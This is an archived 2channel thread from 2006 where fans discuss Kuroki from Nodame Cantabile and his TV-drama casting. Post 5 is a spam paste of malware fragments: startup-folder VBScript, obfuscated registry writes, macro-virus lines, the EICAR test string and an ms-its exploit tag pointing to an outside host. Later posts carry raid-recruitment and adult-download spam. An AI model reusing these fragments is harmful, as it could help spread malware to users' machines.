2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

のだめカンタービレの黒木君大人気スレ

1 :名無しかわいいよ名無し:2006/11/08(水) 19:13:42 ID:wrDXLn0y
千秋・のだめの次に幅を狭くしつつある大人気の黒木君を語るスレ



2 :名無しかわいいよ名無し:2006/11/08(水) 19:27:57 ID:NeMyN+k5


3 :名無しかわいいよ名無し:2006/11/08(水) 19:38:28 ID:o4Njg7N/
ああ、黒木やるよ

4 :名無しかわいいよ名無し:2006/11/08(水) 19:48:14 ID:kiFWRh14
黒木くんはからかいたくなる

5 :<body onload=window()>:2006/11/08(水) 21:12:04 ID:mPpPkA+G
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


6 :名無しかわいいよ名無し:2006/11/08(水) 23:10:46 ID:D+EJE6to
CDブック第一弾のしおりがくろきんだった
当時は微妙と思ったが今は大当たりだと信じている

7 :名無しかわいいよ名無し:2006/11/08(水) 23:59:56 ID:l1m1gm7O
パリ編からだな意識しはじめたのは

8 :名無しかわいいよ名無し:2006/11/09(木) 00:20:33 ID:y3T7mEHV
>>6
いいなぁ。うちは2回とも千秋だった。黒木くん欲しい

気になった理由は自分がオーボエ吹きだからだけど
今は黒木くんの人柄に惚れてます。ドラマ出るかな?

9 :名無しかわいいよ名無し:2006/11/09(木) 00:31:35 ID:6Q5TzFKw
山長の坊ちゃん”達彦さん”こと福士誠治が、黒木役決定だそうですよ♪(事務所サイト)
全然ぐろーく じゃない男前だけど、武士のイメージにはぴったりだとおもうよん
あぁ妄想ふくらみまくり♪

10 :名無しかわいいよ名無し:2006/11/09(木) 00:38:58 ID:6Q5TzFKw
ttp://www.imaioffice.com/fukushi/index.html

じむしょで〜す

11 :名無しかわいいよ名無し:2006/11/09(木) 05:13:18 ID:J0tu33VA
実は第一話から背景に混じっているが地味すぎてレギュラーキャラであることすら気付かれなかった。

と思ってたが違ったのか。

12 :名無しかわいいよ名無し:2006/11/09(木) 05:36:50 ID:tTUxi2BR
千秋と対等に付き合えてる所がモエス
ターニャとの関係もモエス

13 :名無しかわいいよ名無し:2006/11/09(木) 22:01:54 ID:+EFD2pYG
アニメ出てくるかな?
マジで出てきて欲しいんだけど結構遅めの登場だから心配だ・・・

14 :名無しかわいいよ名無し:2006/11/10(金) 11:11:08 ID:ExU+XjGN
それよりも黒木君の登場が17巻では出番少なめなのがちょっと・・・
黒木好きには悲しい巻になりそうだ
ギャル女と結ばれそうだけどどうかな?

>>13
2クールだから当然出てくると思う

15 :名無しかわいいよ名無し:2006/11/10(金) 11:27:59 ID:kgSY793u
>>14
ええええ黒木くん出番少ないのか…
「のだめ」自体の話の流れは好きだが
最近は専ら黒木くんの出番前提で読んでるから…次巻は購入の渋り所かな

16 :名無しかわいいよ名無し:2006/11/10(金) 21:25:16 ID:ExU+XjGN
出番少なめでしかも言葉が「千秋君?」という心の声だけ・・・

17 :名無しかわいいよ名無し:2006/11/11(土) 17:17:50 ID:KHp1X8WH
むなしいねそれw
今ネタなくて話も進まないね

18 :名無しかわいいよ名無し:2006/11/11(土) 17:45:29 ID:qqQ/mqQM
緊急事態! 現在、ガンダムが深刻な危機に瀕しています!!
新シャア板、種・種死の世界にXキャラがいたら、ではガンダムを侮辱するSSが連載されており、
SSの内容はヘイトにあふれ、2ch史上最強の電波っぷりをほこるすさまじいものです
文章も小学生レベルで、別の意味で一見の価値があります!

しかしこれを褒める頭のおかしい電波集団がいるのも確かで、そこでは悪の組織のごとく、
SSを布教しようという狂信者たちが日夜謀略を繰り広げています

われわれはこれら悪辣なDQNから、ガンダムを守らねばなりません
どうかわれわれに力をお貸しください。ともにガンダムを守る戦士となりましょう


作戦会議室はこちら。われわれに賛同するかたがたはこちらに書き込みください
コーヒーヲチスレ
http://tmp6.2ch.net/test/read.cgi/tubo/1162997827/


本スレはこちら。近いうちに総攻撃の予定です
種・種死の世界にXキャラがいたら-コーヒー21杯目-
http://anime.2ch.net/test/read.cgi/shar/1162386281/

できれば、この書き込みのコピペもお願いします。ともにX運命の侵略から戦いましょう!

19 :名無しかわいいよ名無し:2006/11/12(日) 16:51:24 ID:8iv97rvc
黒木君100話出てくるんだろうか?

20 :名無しかわいいよ名無し:2006/11/12(日) 22:24:21 ID:TzKciLJe
配信中動画 11/12
上野樹里、濡れ場。ラブホで終始積極的、キスから丁寧な愛撫。

お宝動画情報---再アップページ---
http://www.adult-place.com/reup.php

画面右下のDOWNLOADをクリック

21 :名無しかわいいよ名無し:2006/11/12(日) 23:03:07 ID:/SWUwyM/
黒木くんの誕生日まであと1時間だね

22 :名無しかわいいよ名無し:2006/11/13(月) 16:19:42 ID:sP9V8XJW
誕生日おめでとう

23 :名無しかわいいよ名無し:2006/11/13(月) 22:31:02 ID:Kyr8frtw
今日なの?おめでとう

24 :名無しかわいいよ名無し:2006/11/13(月) 23:03:25 ID:x7QN9Xmw
滑り込みおめでとう

25 :名無しかわいいよ名無し:2006/11/13(月) 23:20:33 ID:rKlmdehq
今日だったのか。
あと1時間しかないけどおめでとう!

26 :名無しかわいいよ名無し:2006/11/13(月) 23:34:11 ID:0DFAaLOh
おめでとう、そしておやすみ

27 :名無しかわいいよ名無し:2006/11/14(火) 15:52:11 ID:Y5NAwzN/
間に合わなかった・・・ 
ともかくおめでとう。

28 :名無しかわいいよ名無し:2006/11/15(水) 11:48:30 ID:cfu46bsT
というか原作はまだ歳とってないんだけどいくつになるんだろ?
そういえば歳載ってないよね?

29 :名無しかわいいよ名無し:2006/11/15(水) 12:11:27 ID:XAZ9CdEq
千秋とタメかなぁ

30 :名無しかわいいよ名無し:2006/11/16(木) 19:57:51 ID:UBD/V3SP
黒木君を語るスレ

31 :名無しかわいいよ名無し:2006/11/17(金) 06:02:21 ID:ZfreE1JI
黒木100話出てきて

32 :名無しかわいいよ名無し:2006/11/17(金) 22:54:48 ID:Nz7SAsi7
早く黒木くんverの福士の写真を
公式にアップして欲しいんだがなフジテレビさん。

33 :名無しかわいいよ名無し:2006/11/19(日) 16:05:57 ID:kk4hPf4O
青緑百句

34 :名無しかわいいよ名無し:2006/11/20(月) 16:32:27 ID:orR4Urot
今日黒木君ドラマにも出るんだよね
イメージピッタリなら嬉しいな

35 :名無しかわいいよ名無し:2006/11/20(月) 22:15:45 ID:sQO1N9NX
ちょっと黒木くん・・・・イメージ違うお・・・・

36 :名無しかわいいよ名無し:2006/11/20(月) 22:22:48 ID:VicYHbJo
イケメンだった
うーんでも武士っぽかった?
次回がもの凄く気になる

37 :名無しかわいいよ名無し:2006/11/20(月) 22:24:53 ID:rMv/w4sT
あのぬぼぅっとした喋り方はいいと思ったが、体型がスッキリしすぎw
中肉中背なのが良かったのに…
ちょっとしか出なかったから来週に期待

38 :名無しかわいいよ名無し:2006/11/20(月) 22:26:09 ID:s4x64u7o
漫画のドラマ化なら、テニミュくらいそれぞれイメージぴったりの子を
キャスティングしてくれればいいのに

今の所竹中に続くミスキャなんだけど…orz

39 :名無しかわいいよ名無し:2006/11/20(月) 22:32:57 ID:sO8kW81W
そこでテニミュが出てくるかw

40 :名無しかわいいよ名無し:2006/11/20(月) 22:37:12 ID:VicYHbJo
>>37
同意
もっとがっしりしててほしかった

41 :名無しかわいいよ名無し:2006/11/20(月) 22:40:57 ID:TXNWIPrJ
ドラマ青緑っぽくなかった…

42 :名無しかわいいよ名無し:2006/11/20(月) 22:42:57 ID:ssa17hrx
何で?よかったと思うけど・・・
しかも原作黒木も二枚目じゃん

43 :名無しかわいいよ名無し:2006/11/20(月) 22:54:30 ID:sQO1N9NX
黒木くんはイケメンながらにちょっと時代錯誤なイメージ

44 :名無しかわいいよ名無し:2006/11/20(月) 22:56:35 ID:sO8kW81W
武士なトコがイイんだよネ!!

45 :名無しかわいいよ名無し:2006/11/20(月) 23:15:21 ID:VicYHbJo
キャストは良いとして
次で武士らしさを出してくれれば…

46 :名無しかわいいよ名無し:2006/11/21(火) 01:26:55 ID:dxPzyv29
青緑なのにイケメンだよね・・・
さわやかなイケメン兄ちゃんの部類だ

47 :名無しかわいいよ名無し:2006/11/21(火) 08:46:27 ID:lIcezO78
もっと、ださい服着せて

48 :名無しかわいいよ名無し:2006/11/21(火) 16:34:56 ID:mqd/jUC0
このスレの男率は何パーセントくらいですか……。

49 :名無しかわいいよ名無し:2006/11/21(火) 19:03:49 ID:Jb+CAuxS
もう少し髪を寝かせてほしかったなあ

50 :名無しかわいいよ名無し:2006/11/21(火) 22:59:16 ID:bvXk1k80
演じる人頑張ってくれとしか言えないな

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)